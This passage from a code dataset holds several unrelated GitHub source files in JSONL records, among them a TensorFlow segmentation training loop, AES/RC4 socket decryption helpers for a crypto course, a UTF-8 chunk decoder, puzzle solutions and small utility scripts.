loss_all)\n\nwith tf.name_scope('learning_rate'):\n global_step = tf.Variable(0, trainable=False)\n lr = tf.train.polynomial_decay(\n learning_rate=FLAGS.initial_lr,\n global_step=global_step,\n decay_steps=FLAGS.decay_steps,\n end_learning_rate=FLAGS.end_lr,\n power=FLAGS.power,\n cycle=False,\n name=None\n )\n tf.summary.scalar('learning_rate', lr)\n\nwith tf.name_scope(\"opt\"):\n update_ops = tf.get_collection(tf.GraphKeys.UPDATE_OPS)\n with tf.control_dependencies(update_ops):\n optimizer = tf.train.MomentumOptimizer(learning_rate=lr, momentum=0.9).minimize(loss_all, var_list=train_var_list, global_step=global_step)\n\n\nwith tf.name_scope(\"mIoU\"):\n softmax = tf.nn.softmax(logits, axis=-1)\n predictions = tf.argmax(softmax, axis=-1, name='predictions')\n\n train_mIoU = tf.Variable(0, dtype=tf.float32, trainable=False)\n tf.summary.scalar('train_mIoU', train_mIoU)\n test_mIoU = tf.Variable(0, dtype=tf.float32, trainable=False)\n tf.summary.scalar('test_mIoU',test_mIoU)\n\nmerged = tf.summary.merge_all()\n\nimage_batch_0, image_batch, anno_batch, filename = input_data.read_batch(FLAGS.batch_size, FLAGS.height, FLAGS.width, FLAGS.crop_height, FLAGS.crop_width, FLAGS.train_random_scales, FLAGS.scales, FLAGS.train_random_mirror, FLAGS.rgb_mean, type='train')\n\n\n_, image_batch_test, anno_batch_test, filename_test = input_data.read_batch(FLAGS.batch_size, FLAGS.height, FLAGS.width, FLAGS.crop_height, FLAGS.crop_width, FLAGS.val_random_scales, FLAGS.scales, FLAGS.val_random_mirror, FLAGS.rgb_mean, type='val')\n\nwith tf.Session() as sess:\n\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n\n saver = tf.train.Saver()\n\n # if os.path.exists(saved_ckpt_path):\n ckpt = tf.train.get_checkpoint_state(FLAGS.saved_ckpt_path)\n if ckpt and ckpt.model_checkpoint_path:\n saver.restore(sess, ckpt.model_checkpoint_path)\n print(\"Model restored...\")\n\n # saver.restore(sess, './checkpoint/PSPNet.model-30000')\n\n train_summary_writer = tf.summary.FileWriter(FLAGS.saved_summary_train_path, sess.graph)\n test_summary_writer = tf.summary.FileWriter(FLAGS.saved_summary_test_path, sess.graph)\n\n for i in range(0, MAX_STEPS + 1):\n\n b_image_0, b_image, 
b_anno, b_filename = sess.run([image_batch_0, image_batch, anno_batch, filename])\n\n b_image_test, b_anno_test, b_filename_test = sess.run([image_batch_test, anno_batch_test, filename_test])\n\n\n _ = sess.run(optimizer, feed_dict={x: b_image, y: b_anno})\n\n train_summary = sess.run(merged, feed_dict={x: b_image, y: b_anno})\n train_summary_writer.add_summary(train_summary, i)\n test_summary = sess.run(merged, feed_dict={x: b_image_test, y: b_anno_test})\n test_summary_writer.add_summary(test_summary, i)\n\n pred_train, train_loss_val_all, train_loss_val = sess.run([predictions, loss_all, loss_1], feed_dict={x: b_image, y: b_anno})\n pred_test, test_loss_val_all, test_loss_val = sess.run([predictions, loss_all, loss_1], feed_dict={x: b_image_test, y: b_anno_test})\n\n\n\n learning_rate = sess.run(lr)\n\n if i % 200 == 0:\n print(datetime.datetime.now().strftime(\"%Y.%m.%d-%H:%M:%S\"), \" | Step: %d | Train loss all: %f\" % (i, train_loss_val_all))\n\n if i % 1000 == 0:\n\n train_mIoU_val, train_IoU_val = Utils.cal_batch_mIoU(pred_train, b_anno, FLAGS.classes)\n test_mIoU_val, test_IoU_val = Utils.cal_batch_mIoU(pred_test, b_anno_test, FLAGS.classes)\n\n sess.run(tf.assign(train_mIoU, train_mIoU_val))\n sess.run(tf.assign(test_mIoU, test_mIoU_val))\n\n print('------------------------------')\n\n print(\n \"Step: %d | Lr: %f | Train loss all: %f | Train loss: %f | Train mIoU: %f | Test loss all: %f | Test loss: %f | Test mIoU: %f\" % (\n i, learning_rate, train_loss_val_all, train_loss_val, train_mIoU_val, test_loss_val_all, test_loss_val, test_mIoU_val))\n print('------------------------------')\n print(train_IoU_val)\n print(test_IoU_val)\n print('------------------------------')\n #prediction = tf.argmax(logits, axis=-1, name='predictions')\n\n if i % 1000 == 0:\n for j in range(FLAGS.batch_size):\n cv2.imwrite('images/img_%s' % b_filename[j], b_image_0[j])\n\n if i % 5000 == 0:\n saver.save(sess, os.path.join(FLAGS.saved_ckpt_path, 'pspnet.model'), global_step=i)\n\n\n coord.request_stop()\n coord.join(threads)\n\n\n\n\nif __name__ == '__main__':\n\n with tf.Session() as sess:\n input = tf.constant(0.1, shape=[2, 768, 768, 3])\n sess.run(tf.global_variables_initializer())\n\n for i in range(2):\n print(sess.run(auxi_logits)[0, 0, 0])\n print(sess.run(logits)[0, 0, 0])\n","repo_name":"zhulf0804/PSPNet-Tensorflow","sub_path":"old_version_tfrecord/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":11577,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"10061256709","text":"import unittest\n\n\nclass MyTestCase(unittest.TestCase):\n def test_something(self):\n from numpy import load\n data = load('Data Files/cora_split_0.6_0.2_0.npz')\n lst = data.files\n\n for item in lst:\n print(item)\n print(sum(data[item]))\n print(data[item])\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jonyejin/DIL_GCN_Tutorial","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"12193961339","text":"# n = input(\"Please enter your age: \")\r\n# # user types in 18\r\n# print(type(n))\r\n# test commint\r\n#teststt\r\n#yeygegfiefg\r\n#idhsfhriofgiodfh\r\n## test\r\n## test\r\n\r\n\r\np_phrase = \"was it a car or a cat I saw\"\r\n\r\nr_phrase = reversed(p_phrase)\r\nr_phrase = \"\".join(list(r_phrase))\r\nif r_phrase == p_phrase:\r\n print(\"It is palindrome\")\r\nelse:\r\n 
print(\"It is not\")\r\n\r\n print(\"////////////////////////////\")\r\nlist1= [5, 2, 1, 4, 9, 10]\r\nmin_value = list1[0]\r\nfor item in list1:\r\n if item < min_value:\r\n min_value = item\r\nprint(min_value)","repo_name":"zxuerdas/hello_world","sub_path":"course3_wk1.py","file_name":"course3_wk1.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"34663108929","text":"\nimport click, ciphers, mac\nfrom keystore_new import *\nimport os\nfrom packet import Packet\nfrom sealed_object import SealedObject\nfrom cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes\nfrom cryptography.hazmat.backends import default_backend\n\nmodes_ls = dict(\n CBC = modes.CBC,\n CFB = modes.CFB8\n)\n\ndef decrypt_RC4(connection, outfile):\n\n ks = KeyStore('enc_key.store', os.path.abspath(''))\n key = str.encode(ks.keys['mother_base_key'].public_key)[0:15]\n\n print(key)\n\n cipher = Cipher(algorithms.ARC4(key), None, backend=default_backend())\n decryptor = cipher.decryptor()\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n dt = decryptor.update(ct)\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n\ndef decrypt_AES(connection, outfile, keystore, mode_name='CBC'):\n iv = open(\"iv.txt\", 'rb').read(16)\n\n ks = KeyStore(keystore, os.path.abspath(''))\n key = str.encode(ks.keys['mother_base_key'].public_key)\n\n mode_ = modes_ls[mode_name](iv)\n\n cipher = Cipher(algorithms.AES(key), mode_, backend=default_backend())\n decryptor = cipher.decryptor()\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n dt = decryptor.update(ct)\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n\ndef accept_session_packet(connection, keystore, mode_name='CFB'):\n iv = open(\"iv.txt\", 'rb').read(16)\n\n ks = KeyStore(keystore, os.path.abspath(''))\n key = str.encode(ks.keys['mother_base_key'].public_key)\n\n ct = b\"\"\n #while True:\n chunk = connection.recv(512)\n #if not chunk:\n #break\n ct += chunk\n\n so = SealedObject()\n packet = so.deserialize(ct)\n\n cipher = ciphers.KeyAES(key, 'CFB8', False, packet.iv)\n sk = cipher.decrypt(packet.msg)\n\n #send private key\n connection.sendall(ct)\n\n\n #click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n return sk\n\ndef decrypt_AES_with_key_mac(connection, outfile, s_key, hmac, mode_name='CFB8'):\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n so = SealedObject()\n packet = so.deserialize(ct)\n\n #verify mac\n if not hmac.verMAC(packet.msg, packet.mac):\n #reject\n click.echo(click.style('Decryptionphailed', bold = True, fg = 'red'))\n else:\n cipher = ciphers.KeyAES(s_key, 'CFB8', False, packet.iv)\n dt = cipher.decrypt(packet.msg)\n\n outfile.write(dt)\n\n click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n\n\n\ndef decrypt_AES_with_key(connection, outfile, key, mode_name='CFB'):\n iv = open(\"iv.txt\", 'rb').read(16)\n\n mode_ = modes_ls[mode_name](iv)\n\n click.echo(click.style('DEBUG : Decrypting with key %s' % key, bold = True, fg = 'yellow'))\n\n cipher = Cipher(algorithms.AES(key), mode_, backend=default_backend())\n decryptor = cipher.decryptor()\n\n ct = b\"\"\n while True:\n chunk = connection.recv(50)\n if not chunk:\n break\n ct += chunk\n\n dt 
= decryptor.update(ct) + decryptor.finalize()\n    outfile.write(dt)\n\n    click.echo(click.style('Decryption successful!', bold = True, fg = 'green'))\n","repo_name":"diogom93/ssre","sub_path":"tut5/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"19496832613","text":"import abc\nfrom typing import Iterable\n\nfrom . import EncodedChunkStream\nfrom . import DecodedChunkStream\nfrom llm_retrieval.document.chunk import DecodedChunk\nfrom llm_retrieval.utils.common.utf8 import lstrip_continuation_bytes\nfrom llm_retrieval.utils.common.utf8 import truncation_point\n\n\nclass EncodedToDecodedChunkStreamConverter(abc.ABC):\n\n    @abc.abstractmethod\n    def decode(self, encoded_chunk_stream: 'EncodedChunkStream') -> DecodedChunkStream:\n        \"\"\"Decode a stream of encoded chunks into a stream of decoded chunks.\n\n        Raises:\n            UnicodeDecodeError: If the encoded chunks cannot be decoded.\n        \"\"\"\n        pass\n\n\nclass EncodedToDecodedChunkStreamConverterWithSplitCharacterHealing(EncodedToDecodedChunkStreamConverter):\n\n    def decode(self, encoded_chunk_stream: 'EncodedChunkStream') -> DecodedChunkStream:\n        \"\"\"Decode a stream of encoded chunks into a stream of decoded chunks.\n\n        The encoded chunks may be split in the middle of a character. This method will\n        attempt to heal the split by prepending the split bytes to the next chunk, if\n        the next chunk is contiguous. Otherwise, the split bytes will be discarded.\n\n        Raises:\n            UnicodeDecodeError: If the encoded chunks cannot be decoded.\n        \"\"\"\n\n        if encoded_chunk_stream.encoding.lower() != 'utf-8':\n            raise NotImplementedError(f'Only utf-8 encoding is supported.')\n\n        def converted_stream() -> Iterable[DecodedChunk]:\n            truncated_bytes = b''\n            start = 0\n\n            for encoded_chunk in encoded_chunk_stream:\n\n                if encoded_chunk.start - len(truncated_bytes) != start:\n                    truncated_bytes = b''\n                    start = encoded_chunk.start\n                    encoded_chunk_bytes = lstrip_continuation_bytes(encoded_chunk.data)\n                else:\n                    encoded_chunk_bytes = truncated_bytes + encoded_chunk.data\n\n                split = truncation_point(encoded_chunk_bytes)\n\n                if split < len(encoded_chunk_bytes):\n                    truncated_bytes = encoded_chunk_bytes[split:]\n                    encoded_chunk_bytes = encoded_chunk_bytes[:split]\n                else:\n                    truncated_bytes = b''\n\n                if encoded_chunk_bytes:\n                    end = start + len(encoded_chunk_bytes)\n                    yield DecodedChunk(encoded_chunk_bytes.decode(encoded_chunk_stream.encoding), start, end, encoded_chunk_stream.encoding)\n                    start = end\n\n        return DecodedChunkStream(encoded_chunk_stream.encoding).append(converted_stream())\n","repo_name":"callumcurtis/llm-retrieval-stack","sub_path":"llm_retrieval/document/chunk/stream/conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":2632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7651092026","text":"\nfrom datetime import datetime\nimport logging\nimport os\nfrom typing import Optional\n\nfrom expats.settings import SETTINGS\n\n\nDEFAULT_LOG_DIR = os.path.join(\n    SETTINGS.home_root_path, f\"log/{datetime.now().strftime('%Y%m%d_%H:%M')}\"\n)\nLOG_FILENAME = \"log.txt\"\n\n\ndef init_setup_log(log_dir: Optional[str] = None):\n    \"\"\"setup logging to be called only once at initial stage\n\n    Args:\n        log_dir (Optional[str]): path to logging directory. 
Defaults to None, which means DEFAULT_LOG_DIR.\n \"\"\"\n _log_dir = log_dir if log_dir else DEFAULT_LOG_DIR\n if not os.path.exists(_log_dir):\n os.makedirs(_log_dir)\n\n root_logger = logging.getLogger()\n if SETTINGS.is_debug:\n logging.basicConfig(level=logging.DEBUG)\n else:\n logging.basicConfig(level=logging.INFO)\n log_path = os.path.join(_log_dir, LOG_FILENAME)\n file_handler = logging.FileHandler(log_path)\n fmt = logging.Formatter(\"%(asctime)s - %(levelname)s - %(name)s - %(message)s\")\n file_handler.setFormatter(fmt)\n root_logger.addHandler(file_handler)\n\n\ndef get_logger(name: Optional[str] = None):\n return logging.getLogger(name)\n","repo_name":"octanove/expats","sub_path":"expats/common/log.py","file_name":"log.py","file_ext":"py","file_size_in_byte":1137,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"18"} +{"seq_id":"28122201945","text":"from os import path\nfrom typing import Dict, List\nfrom pprint import pprint\n\n\ndef get_edges() -> Dict[str, List[str]]:\n # with open(\"input_test.txt\", 'r') as f:\n # with open(\"input_test_2.txt\", 'r') as f:\n # with open(\"input_test_3.txt\", 'r') as f:\n with open(\"input.txt\", \"r\") as f:\n edge_map = {}\n for line in f.read().splitlines():\n a, b = line.split(\"-\")\n if edge_map.get(a):\n edge_map[a] = edge_map[a] + [b]\n else:\n edge_map[a] = [b]\n if edge_map.get(b):\n edge_map[b] = edge_map[b] + [a]\n else:\n edge_map[b] = [a]\n return edge_map\n\n\ndef find_paths(\n edge_map: Dict[str, List[str]], path: List[str], all_paths: List[List[str]]\n):\n cur_node = path[-1]\n\n if cur_node == \"end\": # full path found\n all_paths.append(path)\n return\n\n cur_path_length = len(path)\n for next_node in edge_map[cur_node]:\n if (\n next_node not in path or next_node.isupper()\n ): # check the current node hasn't been visited or is an upper case big cave\n path = path + [next_node]\n find_paths(edge_map, path, all_paths)\n # set path to always be at the cur_node at this point\n path = path[:cur_path_length]\n\n return all_paths\n\n\nif __name__ == \"__main__\":\n edge_map = get_edges()\n print(edge_map)\n print(\"****\")\n paths = find_paths(edge_map, [\"start\"], [])\n pprint(paths)\n print(len(paths))\n","repo_name":"AaronElijah/AdventOfCode2021","sub_path":"Day12/solution1.py","file_name":"solution1.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"11304316467","text":"\"\"\"--- Part Two ---\n\n\"Great work; looks like we're on the right track after all. Here's a star for\nyour effort.\" However, the program seems a little worried. Can programs be\nworried?\n\n\"Based on what we're seeing, it looks like all the User wanted is some information\nabout the evenly divisible values in the spreadsheet. Unfortunately, none of\nus are equipped for that kind of calculation - most of us specialize in bitwise\noperations.\"\n\nIt sounds like the goal is to find the only two numbers in each row where one\nevenly divides the other - that is, where the result of the division operation\nis a whole number. 
They would like you to find those numbers on each line, divide\nthem, and add up each line's result.\n\nFor example, given the following spreadsheet:\n\n5 9 2 8\n9 4 7 3\n3 8 6 5\n\nIn the first row, the numbers that evenly divide are 8 and 2; the result is 4.\nIn the second row, the two numbers are 9 and 3; the result is 3.\nIn the third row, the result is 2.\n\nIn this example, the sum of the results would be 4 + 3 + 2 = 9.\n\nWhat is the sum of each row's result in your puzzle input?\n\"\"\"\n\ndef test_row_division():\n assert row_division(\"5 9 2 8\") == 4\n assert row_division(\"9 4 7 3\") == 3\n assert row_division(\"3 8 6 5\") == 2\n\n\ndef test_spreadsheet_checksum():\n test_spreadsheet = \"5 9 2 8\\n9 4 7 3\\n3 8 6 5\"\n assert spreadsheet_checksum(test_spreadsheet) == 9\n\n\ndef row_division(row):\n \"\"\"Given a string of numbers, divides the ones that are evenly divisible and returns the result\n\n As the problem specifies, we'll assume that only one pair of numbers is\n evenly divisible\n\n The numbers must be separated by any whitespace character.\"\"\"\n\n numbers = [int(char) for char in row.split()]\n\n # Sorting the array makes us not needing to worry about the numbers at the\n # left of the one we're currently examinating\n numbers.sort(reverse=True)\n\n # We'll examine all the possibilities by brute-force.\n # This is not a good approach, but as the spreadsheet is quite small (16x16),\n # we don't have much to worry about\n for i in range(len(numbers)):\n for j in range(i + 1, len(numbers)):\n int_division = numbers[i] / numbers[j]\n exact_division = numbers[i] / float(numbers[j])\n\n if int_division == exact_division:\n return int_division\n\ndef spreadsheet_checksum(spreadsheet):\n \"\"\"Given a spreadsheet with numbers, computes its checksum\n\n The spreadsheet is expected to be a string where each line represents a row\n and where the numbers in each column are separated by a whitespace.\n\n The checksum is obtained by computing the division between the only two\n numbers of each row that are evenly divisible and then computing the sum\n of all these results.\"\"\"\n\n count = 0\n rows = spreadsheet.splitlines()\n\n for row in rows:\n count += row_division(row)\n\n return count\n\n\nif __name__ == '__main__':\n\n input_path = 'input.txt'\n input = open(input_path).read()\n\n result = spreadsheet_checksum(input)\n print(result)\n","repo_name":"AlexGascon/Advent-of-Code","sub_path":"2017/Day_2/part_2.py","file_name":"part_2.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"12245466693","text":"class Solution:\n def smallestEquivalentString(self, s1: str, s2: str, baseStr: str) -> str:\n def union(a, b):\n a = find(a)\n b = find(b)\n\n if a < b:\n parents[b] = a\n else:\n parents[a] = b\n \n def find(x):\n if x not in parents:\n parents[x] = x\n \n if parents[x] != x:\n parents[x] = find(parents[x])\n \n return parents[x]\n\n parents = {}\n for c1, c2 in zip(s1, s2):\n union(c1, c2)\n print(c1, c2, parents)\n\n\n return ''.join([find(c) for c in baseStr])\n","repo_name":"Ma-due/PS-study","sub_path":"1weeks/1w-4d.py","file_name":"1w-4d.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"73144310441","text":"#!/usr/bin/env python\nimport h5py\nimport matplotlib\nimport matplotlib.pyplot\nimport argparse\n\n\ndef view_pnccd(filename):\n with h5py.File(filename, 
\"r\") as file_handle:\n data1 = file_handle.values()[1].values()[3].value\n data2 = file_handle.values()[1].values()[4].value\n\n fig = matplotlib.pyplot.figure(1)\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122)\n\n ax2.imshow(data1)\n ax1.imshow(data2)\n matplotlib.pyplot.show()\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument(\"file\")\n args = parser.parse_args()\n\n view_pnccd(args.file)\n","repo_name":"ekeberg/Python-tools","sub_path":"Scripts/eke_view_pnccd.py","file_name":"eke_view_pnccd.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"36380746558","text":"from setuptools import setup, find_packages\nimport codecs\nimport os\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith codecs.open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as fh:\n long_description = \"\\n\" + fh.read()\n\nVERSION = '0.0.1'\nDESCRIPTION = 'Converting sql to dbf files'\nLONG_DESCRIPTION = 'A package that allows to convert sql to dbf files.'\n\n# Setting up\nsetup(\n name=\"sql2dbf\",\n version=VERSION,\n author=\"NurlanEmilbekuulu (Nurlan Emilbek uulu)\",\n author_email=\"\",\n description=DESCRIPTION,\n long_description_content_type=\"text/markdown\",\n long_description=long_description,\n packages=find_packages(),\n install_requires=[],\n keywords=['python', 'sql', 'dbf', 'conversion'],\n classifiers=[\n \"Development Status :: 1 - Planning\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python :: 3\",\n \"Operating System :: Unix\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n ]\n)","repo_name":"NurlanEmilbekuulu/sql2dbf","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74820906599","text":"N = int(input())\narr = [int(input()) for _ in range(N)]\nans = 0\nstack = []\nfor i in range(1, N+1):\n while stack:\n if stack[-1][1] > arr[i-1]:\n ans += len(stack)\n break\n else:\n stack.pop()\n stack.append([i, arr[i-1]])\nprint(ans)","repo_name":"CYoungSun/TIL","sub_path":"백준/스택/6198.옥상 정원 꾸미기.py","file_name":"6198.옥상 정원 꾸미기.py","file_ext":"py","file_size_in_byte":280,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"36671764213","text":"import os\nimport pandas as pd\n\n\ndef all_path(dirname):\n result = []#所有的文件\n for maindir, subdir, file_name_list in os.walk(dirname):\n # print(\"1:\",maindir) #当前主目录\n # print(\"2:\",subdir) #当前主目录下的所有目录\n # print(\"3:\",file_name_list) #当前主目录下的所有文件\n for filename in file_name_list:\n apath = os.path.join(maindir, filename)#合并成一个完整路径\n ext = os.path.splitext(apath)[1] # 获取文件后缀,[0]获取的是除文件后缀名以外的内容 \n if ext in filt:\n result.append(apath)\n # print(os.path.splitext(apath)[0],os.path.splitext(apath)[1])\n return result\n\ndef get_cnames(result):\n cnames=[]\n for filepath in result:\n #print(get_FileSize(filename))\n size = os.path.getsize(filepath)\n if size < 1024:\n tempfilename = os.path.split(filepath)[1]\n filename = os.path.splitext(tempfilename)[0]\n print(filename)\n cnames.append()\n os.remove(filepath)\n\ndef write_cnames(cnames,filename):\n df=pd.DataFrame(cnames,columns=['cname'])\n df.to_excel(filename,index=False)\n\nif __name__=='__main__':\n filt=['.json'] #设置过滤后的文件类型,可以设置多个类型\n 
result=all_path(r'G:\\企业信息\\企业基本信息')\n cnames=get_cnames(result)\n write_cnames(cnames,r'G:\\企业信息\\企业基本信息\\小文件企业名.xlsx')","repo_name":"cooLBooy1128/company","sub_path":"筛选小文件.py","file_name":"筛选小文件.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16048876595","text":"# Given a set of positive numbers, find if we can partition\n# it into two subsets such that the sum of elements in both subsets is equal.\n\n# using dp so TLE will not occur\nimport pprint as p\ndef find_subset(arr):\n s = sum(arr)\n result = []\n if s%2 != 0: \n return False\n target = s //2 # THIS IS GOING TO BE MY COLUMNS \n # AND ARR IS MY ROWS \n\n dp = [[0 for i in range(target + 1)] for j in range(len(arr) + 1)]\n #print(dp)\n for i in range(1, len(arr) + 1):# rows loop \n for j in range(1, target + 1): # columns loop \n if j >= arr[i-1]:\n previous_value = dp[i-1][j] \n\n # previous value shows the value hold by previous row for the same target value \n # new value shows the value hold current arr value we have used arr[i-1]\n # as arr has 4 elements only and we increase the size dp to 4 \n # so new value is addition of current arr value and previous value of dp\n # dp[previous row][ current_target_value - current_array value]\n \n new_value = arr[i-1] + dp[i-1][j - arr[i-1]]\n dp[i][j] = max(previous_value, new_value)\n else:\n dp[i][j] = dp[i-1][j]\n\n p.pprint(dp)\n return dp[-1][-1] == target\n\nif __name__==\"__main__\":\n arr = [1,2,3,4]\n print(find_subset(arr))\n","repo_name":"dhruvagarwal29/Leetcode-Prep-Jan_2023","sub_path":"dp_revision/equal_Subset_Sum_Partition.py","file_name":"equal_Subset_Sum_Partition.py","file_ext":"py","file_size_in_byte":1385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"29127349933","text":"short_press = [\n { \"macro\": 10, \"effect\": \"red:ffd:flo:flu\" },\n { \"macro\": 11, \"effect\": \"grn:ffd:flo:flu\" },\n { \"cmd\": \"-3:lev\", \"effect\": \"-3:lev\" },\n { \"color\": \"tun\", \"effect\": \"tun:flo:flu\" },\n { \"raw\": \"stp:0:lev\", \"effect\": \"0:lev:-1:sch:era:flu\" }\n]\n\nlong_press = [\n { \"macro\": 12, \"effect\": \"blu:ffd:flo:flu\" },\n { \"macro\": 13, \"effect\": \"pur:ffd:flo:13:run\" },\n { \"cmd\": \"-4:lev\", \"effect\": \"-4:lev\" },\n { \"color\": \"neo\", \"effect\": \"neo:flo:flu\" },\n { \"random\": \"0,-1:rnd\", \"effect\": \"0,-1:rnd\" }\n]\n\n","repo_name":"jhogsett/linkit","sub_path":"python/mini_settings.py","file_name":"mini_settings.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"la","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"449937914","text":"#!/usr/bin/env python3\n# Author: Armit\n# Create Time: 2022/09/15 \n\nimport os\nfrom argparse import ArgumentParser\n\nimport numpy as np\nnp.random.seed(114514)\n\nSAMPLE_RATE = 16000\nHOP_LENGTH = 160\nTIME_CUTS = {\n '8h': 8 * 60 * 60,\n '4h': 4 * 60 * 60,\n '2h': 2 * 60 * 60,\n '1h': 1 * 60 * 60,\n '30min': 30 * 60,\n '10min': 10 * 60,\n}\n\ndef make_lists(args):\n in_dp = os.path.join(args.data_path, args.dataset)\n mel_dp = os.path.join(in_dp, 'mels')\n mel_fns = os.listdir(mel_dp)\n os.makedirs(args.out_dir, exist_ok=True)\n\n # make full list\n np.random.shuffle(mel_fns)\n fp = os.path.join(args.out_dir, f'{args.dataset}-full.txt')\n with open(fp, 'w', encoding='utf-8') as fh:\n for fn in mel_fns:\n fh.write(fn)\n fh.write('\\n')\n\n dur_cache = { } # {'fn': 
time(float)}\n n_examples = { } # {'list_name': len(selected_fns)}\n # make partial lists\n for list_name, time_cut in TIME_CUTS.items():\n np.random.shuffle(mel_fns)\n selected_fns = []\n for fn in mel_fns:\n selected_fns.append(fn)\n if fn not in dur_cache:\n mel = np.load(os.path.join(mel_dp, fn))\n dur_cache[fn] = mel.shape[1] / (SAMPLE_RATE / HOP_LENGTH)\n time_cut -= dur_cache[fn]\n if time_cut <= 0: break\n\n n_examples[list_name] = len(selected_fns)\n fp = os.path.join(args.out_dir, f'{args.dataset}-{list_name}.txt')\n with open(fp, 'w', encoding='utf-8') as fh:\n for fn in selected_fns:\n fh.write(fn)\n fh.write('\\n')\n\n fp = os.path.join(args.out_dir, f'lists-{args.dataset}.txt')\n with open(fp, 'w', encoding='utf-8') as fh:\n fh.write('[n_exmaples]\\n')\n for k, v in n_examples.items():\n fh.write(f'{k}: {v}')\n fh.write('\\n')\n fh.write(f'full: {len(mel_fns)}')\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\"dataset\", metavar='dataset', help=\"dataset name\")\n parser.add_argument(\"--data_path\", default='data', help=\"data base path\")\n parser.add_argument(\"--out_dir\", default='lists', help=\"output dirname\")\n args = parser.parse_args()\n\n make_lists(args)\n","repo_name":"Kahsolt/soft-vc-acoustic-model-ablation-study","sub_path":"mk_lists.py","file_name":"mk_lists.py","file_ext":"py","file_size_in_byte":2060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"29540681890","text":"import os\nimport pandas as pd\nfrom collections import defaultdict\nfrom datetime import datetime\nimport CodeBook.Repair.repair as rp\nfrom copy import deepcopy\nimport argparse\nfrom CodeBook.Config import *\nfrom CodeBook.Utils.analysis_utils import has_enough_feature, has_enough_sample, convert_bool2int\nfrom CodeBook.Utils.FileHandler import read_csv\n\n\ndef _severity_val(exp: float, real: float) -> float:\n degree = (exp - real) / exp\n return degree\n\n\ndef _severity_degree(val):\n if val < SEVERITY_DICT[\"LOW\"]:\n return \"LOW\"\n elif val > SEVERITY_DICT[\"HIGH\"]:\n return \"HIGH\"\n else:\n return \"MEDIUM\"\n\n\ndef get_label_dict(input: str) -> dict:\n label_set = set()\n if input.startswith(\"mul\"):\n segs = input.split(\"__\")\n for seg in segs[1:]:\n fault_label = seg.split('_')[0]\n if \"lb_{}\".format(fault_label) in LABEL_DICT:\n label_set.add(fault_label)\n else:\n print(\"Invalid label name:\", input)\n else:\n fault_label = input.split('_')[0]\n if \"lb_{}\".format(fault_label) in LABEL_DICT:\n label_set.add(fault_label)\n else:\n print(\"Invalid label name:\", input)\n print(\"Extract labels from {}: {}\".format(input, \",\".join(label_set)))\n\n label_dict = deepcopy(LABEL_DICT)\n for lb in label_set:\n label_dict[\"lb_{}\".format(lb)] = 1\n print(\"label_dict\", label_dict)\n return label_dict\n\n\ndef update_agg_by_dict(agg, label_dict: dict) -> dict:\n for label in label_dict:\n agg[label].append(label_dict[label])\n return agg\n\n\ndef has_negative_last_act(model) -> bool:\n NEG_ACT = {\"tanh\", \"softsign\", \"elu\", \"selu\", \"leakyrelu\", 'LeakyReLU', 'ELU', 'ThresholdedReLU', \"linear\"}\n cur_act = model.layers[int(rp.last_layer(model.layers))].get_config()[\"activation\"]\n if cur_act is None:\n # print(\"Cannot find act in last 